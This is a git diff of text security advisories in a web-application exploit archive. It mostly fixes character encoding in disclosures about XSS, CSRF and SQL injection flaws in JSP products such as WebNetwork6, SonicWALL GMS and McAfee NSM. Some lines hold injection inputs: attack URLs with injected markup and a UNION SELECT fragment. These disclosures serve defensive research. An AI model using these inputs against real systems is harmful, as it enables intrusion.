for the clients listed in the Conducted for heading. +The following reports details the findings from the security assessment performed by Jacob Holcomb of Leland Public Schools for the clients listed in the “Conducted for” heading. -Web Vulnerability Assessment- @@ -41,7 +41,7 @@ The following Zero Day findings were discovered and disclosed through manual tes Recommendations to correct the issues are based off of web development best practices according to OWASP (Open Web Application Security Project) and do not reflect the changes implemented by Stoneware INC. to address the security concerns in the WebNetwork6 product outlined in this document. -Please see the section titled Vendors solution to the problem for a full comprehensive list of the actions taken to resolve the reported issues. +Please see the section titled “Vendors solution to the problem” for a full comprehensive list of the actions taken to resolve the reported issues. -WebNetwork6 Vulnerability Findings- @@ -51,14 +51,14 @@ o This flaw in business programming logic allows malicious users to use the Cros o XSS flaws occur when an application includes user-supplied input in a webpage that is sent to the browser without first properly validating or escaping (Sanitizing) that content. -o Cross Site Scripting allows an attacker to execute scripts in a victims browser to hijack user sessions, deface web sites, insert hostile content, redirect users, etc. +o Cross Site Scripting allows an attacker to execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, etc. * CSRF threat found. Requests sent to the Web Server application do not contain any sort of unique identifier that is tied to the users session. o This flaw in business programming logic allows malicious users to use the Cross Site Request Forgery attack vector to submit a falsified HTTP request to the server and initiate a state change of user data/information on the server. -o Cross Site Request Forgery (CSRF) takes advantage of a web applications logic and allows attackers to predict all the details of a particular action. Browsers send session IDs (cookies) for the requested website automatically when requesting that site, so an attacker can create a malicious web page, HTML post, or e-mail which then generates a forged request indistinguishable from the legitimate request and gets submitted to the server for processing. +o Cross Site Request Forgery (CSRF) takes advantage of a web applications logic and allows attackers to predict all the details of a particular action. Browsers send session ID’s (cookies) for the requested website automatically when requesting that site, so an attacker can create a malicious web page, HTML post, or e-mail which then generates a forged request indistinguishable from the legitimate request and gets submitted to the server for processing. o Malicious hackers can cause victims (Administrator or lesser privileged users) to change any data the victim is allowed to change or perform any action the victim is authorized to use. The user must be logged in for this attack to work. @@ -66,9 +66,9 @@ o The CSRF can be exploited via the XSS attack vector as well using HTML GET req -Common Vulnerabilities and Exposure (CVE)- -The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVEs to the issues outlined in this web application penetration test report. +The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVE’s to the issues outlined in this web application penetration test report. -* CVE-2012-0285 XSS +* CVE-2012-0285 – XSS * CVE-2012-0286 - CSRF -WebNetwork6 Vulnerability Solutions- @@ -128,7 +128,7 @@ XSS Exploitation: In the following example we use HTML tags to embed malicious code on the server hosting the WebNetwork6 application. This task is accomplished by inputting tagged HTML code in fields that accept user input. I will provide a few code snippets that were used in testing which you can find below along with the vulnerable JavaScript script that allows us to embed the arbitrary code through out the WebNetwork6 product. -The affected locations of the webNetwork6 product susceptible to XSS are the My Blog, TeamPages, and News and Articles features. Each of these sections allows us to post content to the following JavaScript (Body of the post), which does not sanitize user input. The subject line (Post title) is also susceptible to persistent XSS. Two attacks possible per WebNetwork6 feature. +The affected locations of the webNetwork6 product susceptible to XSS are the “My Blog”, “TeamPages”, and “News and Articles” features. Each of these sections allows us to post content to the following JavaScript (Body of the post), which does not sanitize user input. The subject line (Post title) is also susceptible to persistent XSS. Two attacks possible per WebNetwork6 feature. Exploited URL (Input Field): https://NameOfServer/swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true @@ -150,7 +150,7 @@ Connection: keep-alive XSS Code snippets: -* +* * diff --git a/platforms/jsp/webapps/18626.txt b/platforms/jsp/webapps/18626.txt index b13cf46a8..d01fec299 100755 --- a/platforms/jsp/webapps/18626.txt +++ b/platforms/jsp/webapps/18626.txt @@ -6,7 +6,7 @@ file tested: ManageEngine_DeviceExpert.exe tested against: Microsoft Windows Server 2003 r2 sp2 Description: -"DeviceExpert is a webbased, multi vendor network change, configuration and +"DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control diff --git a/platforms/jsp/webapps/21545.txt b/platforms/jsp/webapps/21545.txt index 7f755de96..a4aaf590f 100755 --- a/platforms/jsp/webapps/21545.txt +++ b/platforms/jsp/webapps/21545.txt @@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability # Date: Discovered and reported July 2012 # Author: Jacob Holcomb/Gimppy042 # Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite) -# CVE : CVE-2012-4051 for the CSRF +# CVE : CVE-2012-4051 for the CSRF  diff --git a/platforms/jsp/webapps/27011.txt b/platforms/jsp/webapps/27011.txt index dc5445ea8..67dabe942 100755 --- a/platforms/jsp/webapps/27011.txt +++ b/platforms/jsp/webapps/27011.txt @@ -18,9 +18,9 @@ Vendor description: Sybase EAServer fully supports all the Web services standards and enables enterprises to rapidly expose business functions as Web services. EAServer also provides a graphical interface to automate the publication and management of -your companys Web services. Today, EAServer supports EJB and Java/CORBA +your company’s Web services. Today, EAServer supports EJB and Java/CORBA components, CICS integrator, and database stored procedures. These stored -procedures can be from all Sybases databases including ASE, SQL Anywhere, +procedures can be from all Sybase’s databases including ASE, SQL Anywhere, and IQ; in addition, they will support IBM, Oracle, and Microsoft. EAServer can also support iAnywhere messaging services, enabling the developer to expose these components as Web services. diff --git a/platforms/jsp/webapps/29674.txt b/platforms/jsp/webapps/29674.txt index c203c6e92..1672d9386 100755 --- a/platforms/jsp/webapps/29674.txt +++ b/platforms/jsp/webapps/29674.txt @@ -63,11 +63,11 @@ Apply the patch supplied by the vendor (Patch 80293) +-------------------+ -20/10/2013 Vulnerability discovered, vendor notified. -25/10/2013 Vendor acknowledges issue +20/10/2013 – Vulnerability discovered, vendor notified. +25/10/2013 – Vendor acknowledges issue 30/10/2013 - Vendor issues Patch 80293 that fixes the issue -09/11/2013 Exploit demonstrated at Kiwicon 7 -18/11/2013 Advisory released. +09/11/2013 – Exploit demonstrated at Kiwicon 7 +18/11/2013 – Advisory released. +-----------------------------+ |About Security-Assessment.com| diff --git a/platforms/jsp/webapps/30054.txt b/platforms/jsp/webapps/30054.txt index e8e90a0b3..e6ca95415 100755 --- a/platforms/jsp/webapps/30054.txt +++ b/platforms/jsp/webapps/30054.txt @@ -31,12 +31,12 @@ Product & Service Introduction: Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a -managed service provider, Dell SonicWALL offers software and appliance solutions to meet its needs. +managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs. -The award-winning Dell SonicWALL Global Management System (GMS) provides organizations, distributed enterprises and service +The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, -backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardwarein the form of the Universal -Management Appliance (UMA)or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive +backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal +Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service @@ -187,7 +187,7 @@ The vulnerability can be patched by a secure parse, prevention filter mechanism Also restrict and escape the affected input field and output listing in the connected modules. Resolution (DELL SonicWall): -We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select GMS/Analyzer in the Software Type drop down menu. +We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “GMS/Analyzer” in the Software Type drop down menu. Security Risk: @@ -222,7 +222,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2013 | Vulnerability Laboratory [Evolution Security] + Copyright © 2013 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/jsp/webapps/33346.txt b/platforms/jsp/webapps/33346.txt index 9c5d4d922..466196242 100755 --- a/platforms/jsp/webapps/33346.txt +++ b/platforms/jsp/webapps/33346.txt @@ -8,5 +8,5 @@ These issues affect McAfee Network Security Manager 5.1.7.7; other versions may https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14">8b3283a1e57 -https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a">2aa99b60533&iaction=precreatefcb14">8b3283a1e57 +https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a">2aa99b60533&iaction=precreatefcb14">8b3283a1e57 diff --git a/platforms/jsp/webapps/35079.txt b/platforms/jsp/webapps/35079.txt index e77317731..e8f03c52f 100755 --- a/platforms/jsp/webapps/35079.txt +++ b/platforms/jsp/webapps/35079.txt @@ -1,4 +1,4 @@ -Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation ? Remote Code +Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution diff --git a/platforms/jsp/webapps/35181.txt b/platforms/jsp/webapps/35181.txt index 842972a86..e105d6683 100755 --- a/platforms/jsp/webapps/35181.txt +++ b/platforms/jsp/webapps/35181.txt @@ -8,7 +8,7 @@ SEC Consult Vulnerability Lab Security Advisory < 20141106-0 > CVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439 homepage: http://www.symantec.com found: 2014-07-01 - by: Stefan Viehbck + by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= @@ -251,4 +251,4 @@ Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com -EOF Stefan Viehbck / @2014 \ No newline at end of file +EOF Stefan Viehböck / @2014 \ No newline at end of file diff --git a/platforms/jsp/webapps/35594.txt b/platforms/jsp/webapps/35594.txt index c1a50569d..4be9932e9 100755 --- a/platforms/jsp/webapps/35594.txt +++ b/platforms/jsp/webapps/35594.txt @@ -19,7 +19,7 @@ Vendor/product description: "As demands for secure web access expand and delivery becomes increasingly complex, organizations face some formidable challenges. Access Manager provides a simple yet secure and scalable solution that can handle all your -web access needsboth internal as well as in the cloud." +web access needs—both internal as well as in the cloud." URL: https://www.netiq.com/products/access-manager/ diff --git a/platforms/jsp/webapps/35890.txt b/platforms/jsp/webapps/35890.txt index 325a1b6ff..ae95672b4 100755 --- a/platforms/jsp/webapps/35890.txt +++ b/platforms/jsp/webapps/35890.txt @@ -67,9 +67,9 @@ ALL SELECT user(),NULL,NULL,NULL,NULL Timeline ====== -23-Dec-2014 Notification to Vendor -24-Dec-2014 Response from Vendor -30-Dec-2014 Vulnerability fixed by Vendor +23-Dec-2014 – Notification to Vendor +24-Dec-2014 – Response from Vendor +30-Dec-2014 – Vulnerability fixed by Vendor About Rewterz diff --git a/platforms/jsp/webapps/35891.txt b/platforms/jsp/webapps/35891.txt index eb504bce2..0878bd383 100755 --- a/platforms/jsp/webapps/35891.txt +++ b/platforms/jsp/webapps/35891.txt @@ -79,9 +79,9 @@ the domain name in which that particular user exists. Timeline ======= -23-Dec-2014 Notification to Vendor -24-Dec-2014 Response from Vendor -30-Dec-2014 Vulnerability fixed by Vendor +23-Dec-2014 – Notification to Vendor +24-Dec-2014 – Response from Vendor +30-Dec-2014 – Vulnerability fixed by Vendor About Rewterz diff --git a/platforms/jsp/webapps/35904.txt b/platforms/jsp/webapps/35904.txt index 1072b7f5f..ca6f6d927 100755 --- a/platforms/jsp/webapps/35904.txt +++ b/platforms/jsp/webapps/35904.txt @@ -64,9 +64,9 @@ http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 Timeline ====== -23-Dec-2014 Notification to Vendor -24-Dec-2014 Response from Vendor -30-Dec-2014 Vulnerability fixed by Vendor +23-Dec-2014 – Notification to Vendor +24-Dec-2014 – Response from Vendor +30-Dec-2014 – Vulnerability fixed by Vendor About Rewterz diff --git a/platforms/jsp/webapps/36275.txt b/platforms/jsp/webapps/36275.txt index 948394b8a..637f81b5f 100755 --- a/platforms/jsp/webapps/36275.txt +++ b/platforms/jsp/webapps/36275.txt @@ -76,7 +76,7 @@ function initOnloads() { -Code Review: Applications ? All Applications - Topic [IVE - Persistent] +Code Review: Applications � All Applications - Topic [IVE - Persistent]
  • Recently Viewed